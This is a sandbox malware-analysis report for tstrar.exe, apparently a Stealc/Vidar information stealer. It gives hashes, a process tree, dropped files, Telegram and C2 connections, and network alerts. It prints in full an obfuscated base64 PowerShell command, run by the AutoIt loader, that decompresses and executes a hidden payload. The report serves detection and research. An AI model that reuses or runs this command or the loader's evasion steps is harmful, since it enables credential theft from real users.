File name:

tstrar.exe

Full analysis: https://app.any.run/tasks/5aac0470-68ad-4402-92a8-69b2aa111d64
Verdict: Malicious activity
Threats:

Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 23:50:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
autoit
telegram
stealer
stealc
vidar
autoit-loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

D7AA66F36FEBC461C62D08DCBAB34C8E

SHA1:

A32987F42321F2EE68B848E4AB988790015080F2

SHA256:

A6EC31E857DFA13961757B5C2590E2A8EA1ABFC3A0391953890B77D833206967

SSDEEP:

49152:DS+pYd6n+NXXKgZ3RLKjg75psAij0N/FVYAOrwcXtVfSGlvwf8I8sKQTJURA4WPj:DS6YEnaXKA3Rm074AioRn3Iw4HSGCUIt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • tstrar.exe (PID: 7308)

    • AutoIt loader has been detected (YARA)

      • Paradise.com (PID: 7712)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • tstrar.exe (PID: 7308)
      • cmd.exe (PID: 7348)

    • Reads security settings of Internet Explorer

      • tstrar.exe (PID: 7308)

    • Executing commands from a ".bat" file

      • tstrar.exe (PID: 7308)

    • Get information on the list of running processes

      • cmd.exe (PID: 7348)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7348)

    • Application launched itself

      • cmd.exe (PID: 7348)

    • Starts application with an unusual extension

      • cmd.exe (PID: 7348)

    • The executable file from the user directory is run by the CMD process

      • Paradise.com (PID: 7712)

    • Starts the AutoIt3 executable file

      • cmd.exe (PID: 7348)

    • There is functionality for taking screenshot (YARA)

      • Paradise.com (PID: 7712)
      • tstrar.exe (PID: 7308)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • Paradise.com (PID: 7712)

    • BASE64 encoded PowerShell command has been detected

      • Paradise.com (PID: 7712)

    • Base64-obfuscated command line is found

      • Paradise.com (PID: 7712)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7304)
      • csc.exe (PID: 8080)
      • csc.exe (PID: 8204)
      • csc.exe (PID: 8188)
      • csc.exe (PID: 3884)
      • csc.exe (PID: 8564)
      • csc.exe (PID: 8648)
      • csc.exe (PID: 8724)
      • csc.exe (PID: 8748)
      • csc.exe (PID: 8940)
      • csc.exe (PID: 9064)
      • csc.exe (PID: 8380)
      • csc.exe (PID: 8496)
      • csc.exe (PID: 8512)
      • csc.exe (PID: 8072)

    • The process hide an interactive prompt from the user

      • Paradise.com (PID: 7712)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 7304)
      • csc.exe (PID: 8080)
      • csc.exe (PID: 8188)
      • csc.exe (PID: 3884)
      • csc.exe (PID: 8648)
      • csc.exe (PID: 8724)
      • csc.exe (PID: 8748)
      • csc.exe (PID: 8940)
      • csc.exe (PID: 8204)
      • csc.exe (PID: 8380)
      • csc.exe (PID: 8564)
      • csc.exe (PID: 8072)
      • csc.exe (PID: 8496)
      • csc.exe (PID: 8512)
      • csc.exe (PID: 9064)

    • The process bypasses the loading of PowerShell profile settings

      • Paradise.com (PID: 7712)

    • Starts POWERSHELL.EXE for commands execution

      • Paradise.com (PID: 7712)

  • INFO

    • Process checks computer location settings

      • tstrar.exe (PID: 7308)

    • Create files in a temporary directory

      • tstrar.exe (PID: 7308)
      • extrac32.exe (PID: 7620)

    • Reads the computer name

      • tstrar.exe (PID: 7308)
      • extrac32.exe (PID: 7620)
      • Paradise.com (PID: 7712)

    • Checks supported languages

      • tstrar.exe (PID: 7308)
      • extrac32.exe (PID: 7620)
      • Paradise.com (PID: 7712)

    • Creates a new folder

      • cmd.exe (PID: 7600)

    • Reads mouse settings

      • Paradise.com (PID: 7712)

    • Application launched itself

      • chrome.exe (PID: 7672)
      • chrome.exe (PID: 7948)
      • chrome.exe (PID: 7428)
      • chrome.exe (PID: 6512)
      • chrome.exe (PID: 8092)
      • chrome.exe (PID: 2984)
      • chrome.exe (PID: 7744)
      • chrome.exe (PID: 2416)
      • chrome.exe (PID: 3956)
      • chrome.exe (PID: 6560)
      • chrome.exe (PID: 5956)
      • chrome.exe (PID: 5216)
      • chrome.exe (PID: 8804)
      • chrome.exe (PID: 8996)
      • chrome.exe (PID: 3176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2010:04:10 12:19:23+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 9
CodeSize: 25600
InitializedDataSize: 431104
UninitializedDataSize: 16896
EntryPoint: 0x33e9
OSVersion: 5
ImageVersion: 6
SubsystemVersion: 5
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
245
Monitored processes
125
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start tstrar.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs findstr.exe no specs tasklist.exe no specs findstr.exe no specs cmd.exe no specs extrac32.exe no specs findstr.exe no specs cmd.exe no specs cmd.exe no specs paradise.com choice.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs csc.exe csc.exe chrome.exe no specs chrome.exe chrome.exe no specs cvtres.exe no specs chrome.exe no specs chrome.exe no specs csc.exe chrome.exe no specs cvtres.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe chrome.exe no specs cvtres.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs slui.exe csc.exe csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs cvtres.exe no specs csc.exe chrome.exe no specs powershell.exe no specs cvtres.exe no specs conhost.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
208"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc894cdc40,0x7ffc894cdc4c,0x7ffc894cdc58C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
672"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1984,i,1953288166528297045,6325393706896962382,262144 --variations-seed-version /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1012"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc894cdc40,0x7ffc894cdc4c,0x7ffc894cdc58C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1056"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3624 --field-trial-handle=2344,i,3912520296229811536,16009336144356336571,262144 --variations-seed-version /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1328\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1660"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=2344,i,3912520296229811536,16009336144356336571,262144 --variations-seed-version /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1748C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JABhACAAPQAgADUAOQA1ADYAOwAkAGIAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADgAQgBCADgALgB0AG0AcAAnADsAIAAmACgAIAAkAHMAaABFAGwAbABpAGQAWwAxAF0AKwAkAFMASABFAEwAbABJAEQAWwAxADMAXQArACcAeAAnACkAKAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQAgAFsAYwBPAG4AdgBFAHIAdABdADoAOgBmAHIAbwBNAEIAQQBTAEUANgA0AHMAdAByAGkAbgBHACgAJwBwAFYAVABSAGIAdABvAHcARgBIADIAdgB4AEQAOQA0AGkASQBkAEUATQBzAGkAagBhAEoAcQBLAEkAcABXAEcAZABxAHYAVQBhAGgAVgAwAFcAegBYAEUAZwAwAGwAdQBTAFQAVABIAGoAaAB5AG4ARABTAHYANwA5ADkAMABrAFoAbwBVAHUARwAwAFYANwBpAGUAKwBOADcAWABQAHUAOQBUAG4AMgBLAEEAeQA3AHQANgBzAFUAUwBQAFUAZAB3ADMAMABzAFkAeABNAHIAUwBVADcAYgByAGEATQA4AGkAKwBXAFMAVABGAGUAWgBnAFcAUgBJAHQAcgBQAGUASgBKAGMAbQBUAHEAQgAzAEsAUQAxAG8AbABVADUAQgBQADgAUQBCAFoATQBQAFcAVQBaAG8AdgBSAEIAeQBRAFEAUABBAHMASQAzAGQAUABKAEYAQQB5AE0AeQBTAFAAcABTAEUAagBqAHgAVwBNAHMAVAA0ADkASwA0AE0AQgBZADkAUwB2AC8ANwB5AG4ANAB5AHIAbwBNADMAcABlAEIAVwA4AFoASQBzADMARwBRAGwAdwBtAHEAZABMAEcAYQBYADgASABMAFUARQBjADkAOQB2AHUAUABEAFAAYwBJAEEARQBVAHkAQwB3AEoARgBuAEIAagBOAFAAbQBVAGcAcgB6AFIAQwBrAHYASQBuAEkAcQByAG8AQQB1AGwAQgBGAG4AUgBLAHYAdgBoAHYAaABhAHYAMgB1AFUATABsAGMARgBIAEwAawBNAEIAagBpAFUAbwBYAG8AMQBnAE4AMwB5AEoAdABjAG0ANQBHAEEAbQBoAGcAdgBQAGkATgB3AHkAMQB3AGEAYQB3AGUAdQBEADEAcwBEAGkAcwB6AEsAOAA2AE4AbQBDADcAdgBvAFoARQA2AFYAVQBEAHoAVwBKAGwAWQBEAFoALwBKAGwASwA1AFYAZQBOAEEATQB0AHMAUAAwAGgAawBJAFQARwBOAEgAbgAyADMAMAAzADEAdwBYAEkAcwArAGkAUwAvAFMATgB6AG8AUABTAGoAVAA0AFAASQB2AGcAWAA0AGEASABpACsAQgBxADQAZwBRAG0AZQBtAFkASABiAEMASgBQAHcANwB3AEwAWgBuAEcAKwBDAFIAVAAwAFIAYgBQAEwAUQBmAFgAYQA5AEoAYQB1AGEAbQBOAFIARwBUAEQAYwBLAGgATwA2AFQAMwBSAEYANQAyADMAWQBkAHIAYwAvAFcALwBuAHEAOABQAHEAZgAzAFgARwBSAEEAMAB4AEkAdgB2AG4AYwBpAHoANgB2AFgAOQA3ADcAaABGAFgATQAxAG0AQgB3AGIAcQBOAFkATQBMAFYARABpAHYAWABCAFoAUgBMAGUAMgAwAEsAbwBBAE4AKwB4AGQAZwBWAHkAYQBpAEwATABpAEcATwAvAGEAbQBoAFYAOQBIAEQAQQBiAE0ATQB1AFUANwBEAEkAOQBiAGQAcwAvAGMAbwBjADcAegBEACsAcgBwAHQAUwBRADQATAA0ADMAZgAzAGcAaQBvAGcAbAAxAHIAQwByAGIAeABBAE4AVwBlAFUARwA1AGUAOABEAHgAegBTAG4AaABIADQAYwBsAGUAbwBPADkAUwAvAHoAdwBaAFYAOABsADgAdQBOACsANQBCAEsAeQAyAFYAaQBOAFYAZQA4AEgAdABDAEkAWQByADgARgBOAHUAMABJAHcASgBOAGoATgB0ADgAKwA3AEYAcwBFAGMASQBrAEwAegBKAEgAYQBGAGMAMQBoAFoAKwA1AFIAMAByADcAaABjADUAbgB3AEoAeABKADkARwBYAEsAZQB0AG8AMAA3AG8AegBYAHcAbABIADAAQwBiACsAYwBuAEoAaABWAGIASgBHAGMALwBnADMAVwBCAHEATgBEADcAcwBqAHYATQBCAFQAQgBmAG4ARABhAEEAQQAzAFEAbAAvAEoASgAyAEYANgArAEsAMQB1AHMAUABWAEUAMgBkAFcAbgB2AGwAeABmADkANwBoAHQAQgBQAGkANwAxADgAPQAnACAAKQAsACAAWwBzAHkAUwBUAGUATQAuAEkAbwAuAEMATwBtAFAAcgBlAFMAcwBpAE8ATgAuAGMATwBtAHAAcgBlAFMAUwBpAE8AbgBNAG8AZABlAF0AOgA6AGQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAIAAlACAAewAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAIAAkAF8ALABbAFMAWQBTAFQAZQBtAC4AVABlAHgAdAAuAGUAbgBjAG8ARABpAE4ARwBdADoAOgBBAHMAYwBpAEkAIAApAH0AIAB8ACAAJQAgAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApACAAfQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeParadise.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
2136\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2268"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4540 --field-trial-handle=1984,i,1953288166528297045,6325393706896962382,262144 --variations-seed-version /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
94 742
Read events
94 690
Write events
52
Delete events
0

Modification events

(PID) Process:(7712) Paradise.comKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7712) Paradise.comKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7712) Paradise.comKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7948) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(7948) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(7948) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(7948) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(7948) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(7428) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(7428) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
Executable files
15
Suspicious files
80
Text files
145
Unknown types
0

Dropped files

PID
Process
Filename
Type
7308tstrar.exeC:\Users\admin\AppData\Local\Temp\Earlier.jpgtext
MD5:4790A93EE88DEFD3C3D2D82665413C55
SHA256:325EC94A07BC85883EA980C106DE80406784C3FA3A3CE2F6250C46B4227347DB
7620extrac32.exeC:\Users\admin\AppData\Local\Temp\Sweetbinary
MD5:D213092BEC4EDDD6EB131425ACB5E6F1
SHA256:9313D8667510E09B6909D9B6BCFE109258044DB674E7AA6F577B5B0F33F5C00A
7308tstrar.exeC:\Users\admin\AppData\Local\Temp\Amended.jpgbinary
MD5:683B6133045A61DB17A6F1EA880945A6
SHA256:3A4EC7E08500C260FA44ACEE9BF266C94345474E3DB8470ECA7CA1F84FBA526E
7308tstrar.exeC:\Users\admin\AppData\Local\Temp\Reads.jpgbinary
MD5:871AAEF38EB3FB0D8E707884E35252D4
SHA256:0D49233E2E38372475E532CD67BA02DAAAB5FA505DC338E3A676302537BD4878
7308tstrar.exeC:\Users\admin\AppData\Local\Temp\Essentially.jpgbinary
MD5:A1E8B52D3350C66E5B8EE799846C3600
SHA256:8F7F059FE4E17791C0D3B82A9B68DC9EFF04B42DFED533749CA300852FBEB56B
7348cmd.exeC:\Users\admin\AppData\Local\Temp\Earlier.jpg.battext
MD5:4790A93EE88DEFD3C3D2D82665413C55
SHA256:325EC94A07BC85883EA980C106DE80406784C3FA3A3CE2F6250C46B4227347DB
7308tstrar.exeC:\Users\admin\AppData\Local\Temp\Maui.jpgbinary
MD5:BC94B6E9E8022E29C2FF3696EEC00B19
SHA256:6C972C7522E7F49F8B52DE7C806B6057B3745FB2A9E5704957AB5FD4FCBF2B3C
7620extrac32.exeC:\Users\admin\AppData\Local\Temp\Palebinary
MD5:391AA30F76CD86085C2CF4F008E8E95D
SHA256:9CD79C8DB2AC4FCF80963D2DCB7235D6AB1CD008F82B006A0899FD8DC7090C0C
7948chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF11689a.TMP
MD5:
SHA256:
7948chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
55
DNS requests
33
Threats
7

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
7712
Paradise.com
149.154.167.99:443
t.me
Telegram Messenger Inc
GB
whitelisted
7712
Paradise.com
78.47.78.115:443
16.16.4t.com
Hetzner Online GmbH
DE
unknown
7948
chrome.exe
239.255.255.250:1900
whitelisted
5608
chrome.exe
172.217.18.3:443
clientservices.googleapis.com
GOOGLE
US
whitelisted
5608
chrome.exe
74.125.71.84:443
accounts.google.com
GOOGLE
US
whitelisted
5608
chrome.exe
142.250.186.68:443
www.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
google.com
  • 172.217.16.142
whitelisted
AEPSyPPFEStKEK.AEPSyPPFEStKEK
unknown
t.me
  • 149.154.167.99
whitelisted
16.16.4t.com
  • 78.47.78.115
malicious
clientservices.googleapis.com
  • 172.217.18.3
whitelisted
accounts.google.com
  • 74.125.71.84
  • 74.125.133.84
whitelisted
www.google.com
  • 142.250.186.68
whitelisted
www.gstatic.com
  • 142.250.184.195
whitelisted
ogads-pa.clients6.google.com
  • 142.250.184.202
whitelisted

Threats

PID
Process
Class
Message
7712
Paradise.com
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
A Network Trojan was detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2
A Network Trojan was detected
STEALER [ANY.RUN] Base64 Encoded SQLite Dump
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
tstrar.exe